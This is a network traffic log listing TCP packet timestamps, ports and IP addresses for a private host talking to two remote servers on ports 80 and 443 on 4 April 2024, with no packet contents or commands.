Apr 4, 2024 17:49:07.922305107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.922314882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922365904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922382116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922388077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.922427893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922444105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.922451973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922471046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.922506094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.922513962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922533035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922586918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.922600985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922641993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922663927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922702074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922707081 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.922763109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922796011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922810078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922837019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.922854900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922877073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.922899961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922931910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922949076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.922955990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922971010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.923017025 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.923031092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.923036098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.923062086 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.923089981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.923106909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.923147917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.923155069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.923161030 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.924273968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.926640034 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.955498934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955517054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955532074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955539942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955554008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955558062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955564022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955569029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955576897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955590010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955598116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955611944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955620050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955626011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955625057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.955683947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955692053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955704927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955732107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.955741882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955754995 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.955775976 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.955787897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955841064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.955889940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.955952883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.955986023 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:07.956063032 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:07.956079960 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:07.956094980 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:07.956151009 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:07.956171036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.956181049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.956193924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.956201077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.956213951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.956233978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.956237078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.956240892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.956254005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.956260920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.956267118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.956271887 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.956273079 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:07.956274986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.956283092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.956362009 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.956373930 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.956408978 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961035013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961064100 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961072922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961081028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961148024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961157084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961164951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961191893 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961225033 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961231947 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961232901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961256981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961271048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961285114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961304903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961316109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961334944 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961349964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961364031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961381912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961397886 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961431026 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961441040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961486101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961493969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961524963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961553097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961564064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961581945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961585045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961615086 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961632967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961641073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961678982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961683989 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961714029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961749077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961755991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961782932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961808920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961817980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961848974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961853981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961883068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961883068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961894035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961922884 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961942911 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961954117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961961985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.961972952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.961996078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962017059 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962047100 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962050915 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962068081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962110996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962119102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962132931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962152004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962168932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962173939 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962188959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962229967 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962248087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962249994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962256908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962275982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962302923 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962316990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962348938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962357044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962368965 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962398052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962420940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962420940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962447882 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962461948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962506056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962508917 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962516069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962555885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962557077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962565899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962635040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962642908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962650061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962654114 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962681055 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962691069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962739944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962749004 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962763071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962802887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962810040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962815046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962826967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962847948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962858915 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962888956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962897062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962915897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962924957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.962981939 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.962997913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963006973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963015079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963032961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963051081 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.963063002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963073015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.963120937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963149071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963165998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963191986 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.963208914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963216066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963218927 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.963257074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963270903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.963283062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963290930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963339090 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.963341951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963383913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963397026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963428020 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.963432074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963458061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.963496923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963505030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963546991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963553905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963567019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963614941 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.963627100 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963645935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963689089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963711977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963757038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963763952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.963795900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963834047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963877916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963880062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.963896036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963932991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963943958 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.963956118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.963994980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964004993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.964010000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964054108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.964068890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964076996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964157104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964165926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964215994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.964260101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964267969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964281082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964322090 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.964330912 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.964338064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964345932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964375019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964412928 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.964417934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964458942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964519978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964529037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964579105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.964589119 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964610100 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964659929 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.964687109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964694977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964708090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964745045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964754105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.964776039 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.964782000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964838982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964847088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964886904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.964968920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.964977026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965033054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965034962 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.965040922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965060949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965090036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965110064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965111017 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.965152025 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.965157032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965177059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965213060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965248108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.965256929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965267897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965310097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965317011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965326071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.965332031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965362072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.965396881 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965404987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965416908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965432882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965447903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.965468884 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.965502024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965509892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965559006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.965586901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965595007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965609074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965626955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965640068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965671062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.965687037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965698004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.965739965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965748072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965759993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965773106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965820074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.965832949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965869904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965882063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965931892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.965956926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.965966940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966005087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966012955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966015100 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.966042042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966042042 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.966051102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966106892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966130972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966171026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.966187000 CEST	49730	80	192.168.2.10	103.23.232.80
